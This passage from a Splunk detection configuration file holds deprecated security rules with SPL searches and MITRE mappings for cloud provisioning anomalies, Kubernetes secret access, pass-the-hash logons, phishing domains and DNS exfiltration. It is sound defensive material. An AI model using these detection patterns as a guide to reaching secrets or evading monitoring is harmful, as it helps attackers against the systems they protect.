10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1535"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` (eventName=Run* OR eventName=Create*) | iplocation sourceIPAddress | search Region=* [search `cloudtrail` (eventName=Run* OR eventName=Create*) | iplocation sourceIPAddress | search Region=* | stats earliest(_time) as firstTime, latest(_time) as lastTime by sourceIPAddress, City, Region, Country | inputlookup append=t previously_seen_provisioning_activity_src.csv | stats min(firstTime) as firstTime max(lastTime) as lastTime by sourceIPAddress, City, Region, Country | outputlookup previously_seen_provisioning_activity_src.csv | stats min(firstTime) as firstTime max(lastTime) as lastTime by Region | eval newRegion=if(firstTime >= relative_time(now(), "-70m@m"), 1, 0) | where newRegion=1 | table Region] | spath output=user userIdentity.arn | rename sourceIPAddress as src_ip | table _time, user, src_ip, Region, eventName, errorCode | `aws_cloud_provisioning_from_previously_unseen_region_filter` [ESCU - AWS EKS Kubernetes cluster sensitive object access - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search provides information on Kubernetes accounts accessing sensitve objects such as configmaps or secrets action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search provides information on Kubernetes accounts accessing sensitve objects such as configmaps or secrets action.escu.how_to_implement = You must install Splunk Add-on for Amazon Web Services and Splunk App for AWS. This search works with cloudwatch logs. action.escu.known_false_positives = Sensitive object access is not necessarily malicious but user and object context can provide guidance for detection. action.escu.creation_date = 2020-06-23 action.escu.modification_date = 2020-06-23 action.escu.confidence = high action.escu.full_search_name = ESCU - AWS EKS Kubernetes cluster sensitive object access - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Kubernetes Sensitive Object Access Activity"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - AWS EKS Kubernetes cluster sensitive object access - Rule action.correlationsearch.annotations = {"analytic_story": ["Kubernetes Sensitive Object Access Activity"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `aws_cloudwatchlogs_eks` objectRef.resource=secrets OR configmaps sourceIPs{}!=::1 sourceIPs{}!=127.0.0.1 |table sourceIPs{} user.username user.groups{} objectRef.resource objectRef.namespace objectRef.name annotations.authorization.k8s.io/reason |dedup user.username user.groups{} |`aws_eks_kubernetes_cluster_sensitive_object_access_filter` [ESCU - Clients Connecting to Multiple DNS Servers - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search allows you to identify the endpoints that have connected to more than five DNS servers and made DNS Queries over the time frame of the search. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1048.003"], "nist": ["DE.CM"]} action.escu.data_models = ["Network_Resolution"] action.escu.eli5 = This search allows you to identify the endpoints that have connected to more than five DNS servers and made DNS Queries over the time frame of the search. action.escu.how_to_implement = This search requires that DNS data is being ingested and populating the `Network_Resolution` data model. This data can come from DNS logs or from solutions that parse network traffic for this data, such as Splunk Stream or Bro.\ This search produces fields (`dest_count`) that are not yet supported by ES Incident Review and therefore cannot be viewed when a notable event is raised. These fields contribute additional context to the notable. To see the additional metadata, add the following fields, if not already present, to Incident Review - Event Attributes (Configure > Incident Management > Incident Review Settings > Add New Entry):\\n1. **Label:** Distinct DNS Connections, **Field:** dest_count\ Detailed documentation on how to create a new field within Incident Review may be found here: `https://docs.splunk.com/Documentation/ES/5.3.0/Admin/Customizenotables#Add_a_field_to_the_notable_event_details` action.escu.known_false_positives = It's possible that an enterprise has more than five DNS servers that are configured in a round-robin rotation. Please customize the search, as appropriate. action.escu.creation_date = 2020-07-21 action.escu.modification_date = 2020-07-21 action.escu.confidence = high action.escu.full_search_name = ESCU - Clients Connecting to Multiple DNS Servers - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["DNS Hijacking", "Suspicious DNS Traffic", "Host Redirection", "Command And Control"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Clients Connecting to Multiple DNS Servers - Rule action.correlationsearch.annotations = {"analytic_story": ["DNS Hijacking", "Suspicious DNS Traffic", "Host Redirection", "Command And Control"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1048.003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search allows you to identify the endpoints that have connected to more than five DNS servers and made DNS Queries over the time frame of the search. action.notable.param.rule_title = Clients Connecting to Multiple DNS Servers action.notable.param.security_domain = network action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count, values(DNS.dest) AS dest dc(DNS.dest) as dest_count from datamodel=Network_Resolution where DNS.message_type=QUERY by DNS.src | `drop_dm_object_name("Network_Resolution")` |where dest_count > 5 | `clients_connecting_to_multiple_dns_servers_filter` [ESCU - Cloud Network Access Control List Deleted - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. Enforcing network-access controls is one of the defensive mechanisms used by cloud administrators to restrict access to a cloud instance. After the attacker has gained control of the console by compromising an admin account, they can delete a network ACL and gain access to the instance from anywhere. This search will query the Change datamodel to detect users deleting network ACLs. Deprecated because it's a duplicate action.escu.mappings = {"cis20": ["CIS 13"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = Enforcing network-access controls is one of the defensive mechanisms used by cloud administrators to restrict access to a cloud instance. After the attacker has gained control of the console by compromising an admin account, they can delete a network ACL and gain access to the instance from anywhere. This search will query the Change datamodel to detect users deleting network ACLs. Deprecated because it's a duplicate action.escu.how_to_implement = You must be ingesting your cloud infrastructure logs from your cloud provider. You can also provide additional filtering for this search by customizing the `cloud_network_access_control_list_deleted_filter` macro. action.escu.known_false_positives = It's possible that a user has legitimately deleted a network ACL. action.escu.creation_date = 2020-09-08 action.escu.modification_date = 2020-09-08 action.escu.confidence = high action.escu.full_search_name = ESCU - Cloud Network Access Control List Deleted - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["Cloud Network ACL Activity"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Cloud Network Access Control List Deleted - Rule action.correlationsearch.annotations = {"analytic_story": ["Cloud Network ACL Activity"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` eventName=DeleteNetworkAcl|rename userIdentity.arn as arn | stats count min(_time) as firstTime max(_time) as lastTime values(errorMessage) values(errorCode) values(userAgent) values(userIdentity.*) by src userName arn eventName | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `cloud_network_access_control_list_deleted_filter` [ESCU - Correlation by Repository and Risk - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search has been deprecated and updated with Risk Rule for Dev Sec Ops by Repository detection. The following analytic detects by correlating repository and risk score to identify patterns and trends in the data based on the level of risk associated. The analytic adds any null values and calculates the sum of the risk scores for each detection. Then, the analytic captures the source and user information for each detection and sorts the results in ascending order based on the risk score. Finally, the analytic filters the detections with a risk score below 80 and focuses only on high-risk detections.This detection is important because it provides valuable insights into the distribution of high-risk activities across different repositories. It also identifies the most vulnerable repositories that are frequently targeted by potential threats. Additionally, it proactively detects and responds to potential threats, thereby minimizing the impact of attacks and safeguarding critical assets. Finally, it provides a comprehensive view of the risk landscape and helps to make informed decisions to protect the organization's data and infrastructure. False positives might occur so it is important to identify the impact of the attack and prioritize response and mitigation efforts. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204.003", "T1204"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search has been deprecated and updated with Risk Rule for Dev Sec Ops by Repository detection. The following analytic detects by correlating repository and risk score to identify patterns and trends in the data based on the level of risk associated. The analytic adds any null values and calculates the sum of the risk scores for each detection. Then, the analytic captures the source and user information for each detection and sorts the results in ascending order based on the risk score. Finally, the analytic filters the detections with a risk score below 80 and focuses only on high-risk detections.This detection is important because it provides valuable insights into the distribution of high-risk activities across different repositories. It also identifies the most vulnerable repositories that are frequently targeted by potential threats. Additionally, it proactively detects and responds to potential threats, thereby minimizing the impact of attacks and safeguarding critical assets. Finally, it provides a comprehensive view of the risk landscape and helps to make informed decisions to protect the organization's data and infrastructure. False positives might occur so it is important to identify the impact of the attack and prioritize response and mitigation efforts. action.escu.how_to_implement = For Dev Sec Ops POC action.escu.known_false_positives = unknown action.escu.creation_date = 2021-09-06 action.escu.modification_date = 2021-09-06 action.escu.confidence = high action.escu.full_search_name = ESCU - Correlation by Repository and Risk - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Dev Sec Ops"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Correlation by Repository and Risk - Rule action.correlationsearch.annotations = {"analytic_story": ["Dev Sec Ops"], "cis20": ["CIS 13"], "confidence": 100, "impact": 70, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204.003", "T1204"], "nist": ["DE.AE"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search has been deprecated and updated with Risk Rule for Dev Sec Ops by Repository detection. The following analytic detects by correlating repository and risk score to identify patterns and trends in the data based on the level of risk associated. The analytic adds any null values and calculates the sum of the risk scores for each detection. Then, the analytic captures the source and user information for each detection and sorts the results in ascending order based on the risk score. Finally, the analytic filters the detections with a risk score below 80 and focuses only on high-risk detections.This detection is important because it provides valuable insights into the distribution of high-risk activities across different repositories. It also identifies the most vulnerable repositories that are frequently targeted by potential threats. Additionally, it proactively detects and responds to potential threats, thereby minimizing the impact of attacks and safeguarding critical assets. Finally, it provides a comprehensive view of the risk landscape and helps to make informed decisions to protect the organization's data and infrastructure. False positives might occur so it is important to identify the impact of the attack and prioritize response and mitigation efforts. action.notable.param.rule_title = RBA: Correlation by Repository and Risk action.notable.param.security_domain = network action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `risk_index` | fillnull | stats sum(risk_score) as risk_score values(source) as signals values(user) as user by repository | sort - risk_score | where risk_score > 80 | `correlation_by_repository_and_risk_filter` [ESCU - Correlation by User and Risk - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. The following analytic detects the correlation between the user and risk score and identifies users with a high risk score that pose a significant security risk such as unauthorized access attempts, suspicious behavior, or potential insider threats. Next, the analytic calculates the sum of the risk scores and groups the results by user, the corresponding signals, and the repository. The results are sorted in descending order based on the risk score and filtered to include records with a risk score greater than 80. Finally, the results are passed through a correlation filter specific to the user and risk. This detection is important because it identifies users who have a high risk score and helps to prioritize investigations and allocate resources. False positives might occur but the impact of such an attack can vary depending on the specific scenario such as data exfiltration, system compromise, or the disruption of critical services. Please investigate this notable event. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204.003", "T1204"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytic detects the correlation between the user and risk score and identifies users with a high risk score that pose a significant security risk such as unauthorized access attempts, suspicious behavior, or potential insider threats. Next, the analytic calculates the sum of the risk scores and groups the results by user, the corresponding signals, and the repository. The results are sorted in descending order based on the risk score and filtered to include records with a risk score greater than 80. Finally, the results are passed through a correlation filter specific to the user and risk. This detection is important because it identifies users who have a high risk score and helps to prioritize investigations and allocate resources. False positives might occur but the impact of such an attack can vary depending on the specific scenario such as data exfiltration, system compromise, or the disruption of critical services. Please investigate this notable event. action.escu.how_to_implement = For Dev Sec Ops POC action.escu.known_false_positives = unknown action.escu.creation_date = 2021-09-06 action.escu.modification_date = 2021-09-06 action.escu.confidence = high action.escu.full_search_name = ESCU - Correlation by User and Risk - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Dev Sec Ops"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Correlation by User and Risk - Rule action.correlationsearch.annotations = {"analytic_story": ["Dev Sec Ops"], "cis20": ["CIS 13"], "confidence": 100, "impact": 70, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204.003", "T1204"], "nist": ["DE.AE"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic detects the correlation between the user and risk score and identifies users with a high risk score that pose a significant security risk such as unauthorized access attempts, suspicious behavior, or potential insider threats. Next, the analytic calculates the sum of the risk scores and groups the results by user, the corresponding signals, and the repository. The results are sorted in descending order based on the risk score and filtered to include records with a risk score greater than 80. Finally, the results are passed through a correlation filter specific to the user and risk. This detection is important because it identifies users who have a high risk score and helps to prioritize investigations and allocate resources. False positives might occur but the impact of such an attack can vary depending on the specific scenario such as data exfiltration, system compromise, or the disruption of critical services. Please investigate this notable event. action.notable.param.rule_title = RBA: Correlation by User and Risk action.notable.param.security_domain = network action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `risk_index` | fillnull | stats sum(risk_score) as risk_score values(source) as signals values(repository) as repository by user | sort - risk_score | where risk_score > 80 | `correlation_by_user_and_risk_filter` [ESCU - Detect Activity Related to Pass the Hash Attacks - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search looks for specific authentication events from the Windows Security Event logs to detect potential attempts at using the Pass-the-Hash technique. This search is DEPRECATED as it is possible for event code 4624 to generate a high level of noise, as legitimate logon events may also trigger this event code. This can be especially true in environments with high levels of user activity, such as those with many concurrent logons or frequent logon attempts. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1550", "T1550.002"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search looks for specific authentication events from the Windows Security Event logs to detect potential attempts at using the Pass-the-Hash technique. This search is DEPRECATED as it is possible for event code 4624 to generate a high level of noise, as legitimate logon events may also trigger this event code. This can be especially true in environments with high levels of user activity, such as those with many concurrent logons or frequent logon attempts. action.escu.how_to_implement = To successfully implement this search, you must ingest your Windows Security Event logs and leverage the latest TA for Windows. action.escu.known_false_positives = Legitimate logon activity by authorized NTLM systems may be detected by this search. Please investigate as appropriate. action.escu.creation_date = 2020-10-15 action.escu.modification_date = 2020-10-15 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect Activity Related to Pass the Hash Attacks - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Active Directory Lateral Movement"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Detect Activity Related to Pass the Hash Attacks - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Lateral Movement"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1550", "T1550.002"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `wineventlog_security` EventCode=4624 (Logon_Type=3 Logon_Process=NtLmSsp NOT AccountName="ANONYMOUS LOGON") OR (Logon_Type=9 Logon_Process=seclogo) | fillnull | stats count min(_time) as firstTime max(_time) as lastTime by EventCode, Logon_Type, WorkstationName, user, dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_activity_related_to_pass_the_hash_attacks_filter` [ESCU - Detect API activity from users without MFA - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search looks for AWS CloudTrail events where a user logged into the AWS account, is making API calls and has not enabled Multi Factor authentication. Multi factor authentication adds a layer of security by forcing the users to type a unique authentication code from an approved authentication device when they access AWS websites or services. AWS Best Practices recommend that you enable MFA for privileged IAM users. action.escu.mappings = {"cis20": ["CIS 13"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search looks for AWS CloudTrail events where a user logged into the AWS account, is making API calls and has not enabled Multi Factor authentication. Multi factor authentication adds a layer of security by forcing the users to type a unique authentication code from an approved authentication device when they access AWS websites or services. AWS Best Practices recommend that you enable MFA for privileged IAM users. action.escu.how_to_implement = You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your AWS CloudTrail inputs. Leverage the support search `Create a list of approved AWS service accounts`: run it once every 30 days to create a list of service accounts and validate them.\ This search produces fields (`eventName`,`userIdentity.type`,`userIdentity.arn`) that are not yet supported by ES Incident Review and therefore cannot be viewed when a notable event is raised. These fields contribute additional context to the notable. To see the additional metadata, add the following fields, if not already present, to Incident Review - Event Attributes (Configure > Incident Management > Incident Review Settings > Add New Entry):\\n1. **Label:** AWS Event Name, **Field:** eventName\ 1. \ 1. **Label:** AWS User ARN, **Field:** userIdentity.arn\ 1. \ 1. **Label:** AWS User Type, **Field:** userIdentity.type\ Detailed documentation on how to create a new field within Incident Review may be found here: `https://docs.splunk.com/Documentation/ES/5.3.0/Admin/Customizenotables#Add_a_field_to_the_notable_event_details` action.escu.known_false_positives = Many service accounts configured within an AWS infrastructure do not have multi factor authentication enabled. Please ignore the service accounts, if triggered and instead add them to the aws_service_accounts.csv file to fine tune the detection. It is also possible that the search detects users in your environment using Single Sign-On systems, since the MFA is not handled by AWS. action.escu.creation_date = 2018-05-17 action.escu.modification_date = 2018-05-17 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect API activity from users without MFA - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["AWS User Monitoring"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Detect API activity from users without MFA - Rule action.correlationsearch.annotations = {"analytic_story": ["AWS User Monitoring"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` userIdentity.sessionContext.attributes.mfaAuthenticated=false | search NOT [| inputlookup aws_service_accounts | fields identity | rename identity as user]| stats count min(_time) as firstTime max(_time) as lastTime values(eventName) as eventName by userIdentity.arn userIdentity.type user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_api_activity_from_users_without_mfa_filter` [ESCU - Detect AWS API Activities From Unapproved Accounts - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search looks for successful AWS CloudTrail activity by user accounts that are not listed in the identity table or `aws_service_accounts.csv`. It returns event names and count, as well as the first and last time a specific user or service is detected, grouped by users. Deprecated because managing this list can be quite hard. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.004"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search looks for successful AWS CloudTrail activity by user accounts that are not listed in the identity table or `aws_service_accounts.csv`. It returns event names and count, as well as the first and last time a specific user or service is detected, grouped by users. Deprecated because managing this list can be quite hard. action.escu.how_to_implement = You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your AWS CloudTrail inputs. You must also populate the `identity_lookup_expanded` lookup shipped with the Asset and Identity framework to be able to look up users in your identity table in Enterprise Security (ES). Leverage the support search called "Create a list of approved AWS service accounts": run it once every 30 days to create and validate a list of service accounts.\ This search produces fields (`eventName`,`firstTime`,`lastTime`) that are not yet supported by ES Incident Review and therefore cannot be viewed when a notable event is raised. These fields contribute additional context to the notable. To see the additional metadata, add the following fields, if not already present, to Incident Review - Event Attributes (Configure > Incident Management > Incident Review Settings > Add New Entry):\\n1. **Label:** AWS Event Name, **Field:** eventName\ 1. \ 1. **Label:** First Time, **Field:** firstTime\ 1. \ 1. **Label:** Last Time, **Field:** lastTime\ Detailed documentation on how to create a new field within Incident Review may be found here: `https://docs.splunk.com/Documentation/ES/5.3.0/Admin/Customizenotables#Add_a_field_to_the_notable_event_details` action.escu.known_false_positives = It's likely that you'll find activity detected by users/service accounts that are not listed in the `identity_lookup_expanded` or ` aws_service_accounts.csv` file. If the user is a legitimate service account, update the `aws_service_accounts.csv` table with that entry. action.escu.creation_date = 2020-07-21 action.escu.modification_date = 2020-07-21 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect AWS API Activities From Unapproved Accounts - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["AWS User Monitoring"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Detect AWS API Activities From Unapproved Accounts - Rule action.correlationsearch.annotations = {"analytic_story": ["AWS User Monitoring"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.004"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` errorCode=success | rename userName as identity | search NOT [| inputlookup identity_lookup_expanded | fields identity] | search NOT [| inputlookup aws_service_accounts | fields identity] | rename identity as user | stats count min(_time) as firstTime max(_time) as lastTime values(eventName) as eventName by user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_aws_api_activities_from_unapproved_accounts_filter` [ESCU - Detect DNS requests to Phishing Sites leveraging EvilGinx2 - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search looks for DNS requests for phishing domains that are leveraging EvilGinx tools to mimic websites. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566.003"], "nist": ["DE.CM"]} action.escu.data_models = ["Network_Resolution", "Web"] action.escu.eli5 = This search looks for DNS requests for phishing domains that are leveraging EvilGinx tools to mimic websites. action.escu.how_to_implement = You need to ingest data from your DNS logs in the Network_Resolution datamodel. Specifically you must ingest the domain that is being queried and the IP of the host originating the request. Ideally, you should also be ingesting the answer to the query and the query type. This approach allows you to also create your own localized passive DNS capability which can aid you in future investigations. You will have to add legitimate domain names to the `legit_domains.csv` file shipped with the app. \ **Splunk>Phantom Playbook Integration**\ If Splunk>Phantom is also configured in your environment, a Playbook called `Lets Encrypt Domain Investigate` can be configured to run when any results are found by this detection search. To use this integration, install the Phantom App for Splunk `https://splunkbase.splunk.com/app/3411/`, add the correct hostname to the "Phantom Instance" field in the Adaptive Response Actions when configuring this detection search, and set the corresponding Playbook to active. \ (Playbook link:`https://my.phantom.us/4.2/playbook/lets-encrypt-domain-investigate/`).\ action.escu.known_false_positives = If a known good domain is not listed in the legit_domains.csv file, then the search could give you false postives. Please update that lookup file to filter out DNS requests to legitimate domains. action.escu.creation_date = 2020-07-21 action.escu.modification_date = 2020-07-21 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect DNS requests to Phishing Sites leveraging EvilGinx2 - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Common Phishing Frameworks"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Detect DNS requests to Phishing Sites leveraging EvilGinx2 - Rule action.correlationsearch.annotations = {"analytic_story": ["Common Phishing Frameworks"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566.003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search looks for DNS requests for phishing domains that are leveraging EvilGinx tools to mimic websites. action.notable.param.rule_title = Detect DNS requests to Phishing Sites leveraging EvilGinx2 action.notable.param.security_domain = network action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime values(DNS.answer) as answer from datamodel=Network_Resolution.DNS by DNS.dest DNS.src DNS.query host | `drop_dm_object_name(DNS)`| rex field=query ".*?(?[^./:]+\.(\S{2,3}|\S{2,3}.\S{2,3}))$" | stats count values(query) as query by domain dest src answer| search `evilginx_phishlets_amazon` OR `evilginx_phishlets_facebook` OR `evilginx_phishlets_github` OR `evilginx_phishlets_0365` OR `evilginx_phishlets_outlook` OR `evilginx_phishlets_aws` OR `evilginx_phishlets_google` | search NOT [ inputlookup legit_domains.csv | fields domain]| join domain type=outer [| tstats count `security_content_summariesonly` values(Web.url) as url from datamodel=Web.Web by Web.dest Web.site | rename "Web.*" as * | rex field=site ".*?(?[^./:]+\.(\S{2,3}|\S{2,3}.\S{2,3}))$" | table dest domain url] | table count src dest query answer domain url | `detect_dns_requests_to_phishing_sites_leveraging_evilginx2_filter` [ESCU - Detect Long DNS TXT Record Response - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search is used to detect attempts to use DNS tunneling, by calculating the length of responses to DNS TXT queries. Endpoints using DNS as a method of transmission for data exfiltration, Command And Control, or evasion of security controls can often be detected by noting unusually large volumes of DNS traffic. Deprecated because this detection should focus on DNS queries instead of DNS responses. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1048.003"], "nist": ["DE.CM"]} action.escu.data_models = ["Network_Resolution"] action.escu.eli5 = This search is used to detect attempts to use DNS tunneling, by calculating the length of responses to DNS TXT queries. Endpoints using DNS as a method of transmission for data 